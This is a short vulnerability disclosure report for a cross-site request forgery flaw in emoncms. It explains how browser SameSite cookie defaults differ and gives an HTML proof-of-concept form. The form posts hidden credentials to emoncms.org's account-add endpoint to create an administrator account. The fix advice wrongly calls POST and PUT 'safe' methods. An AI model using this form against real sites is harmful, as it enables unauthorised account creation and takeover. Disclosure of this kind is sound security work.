Cross-Site Request Forgery (CSRF) in emoncms/emoncms
Jul 22nd 2021
When you don't set the SameSite attribute of cookies the browsers have special act in front of this issue.(I mean set default value on it) chrome and chromium based browsers set the attribute "Lax" that mean if you do add/delete/alter operation in a get HTTP request then your site more vulnerable with CSRF attacks.
But Firefox ( one of big ones ) don't set this attribute to "Lax" and set it to "none" that makes all POST and GET requests more Vulnerable to CSRF attack.
In Firefox I can add any Administer in Administer multiple accounts part of profile section With CSRF that users already allowed manually do it.
🕵️♂️ Proof of Concept
<html> <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://emoncms.org/billing/account-add.json" method="POST"> <input type="hidden" name="username" value="newuesr" /> <input type="hidden" name="password" value="newpassword" /> <input type="submit" value="Submit request" /> </form> </body> </html>
This vulnerability is capable of add any administrator in Firefox.
You should set SameSite attribute to Lax and only use safe HTTP methods like POST and PUT for writing data on your good website.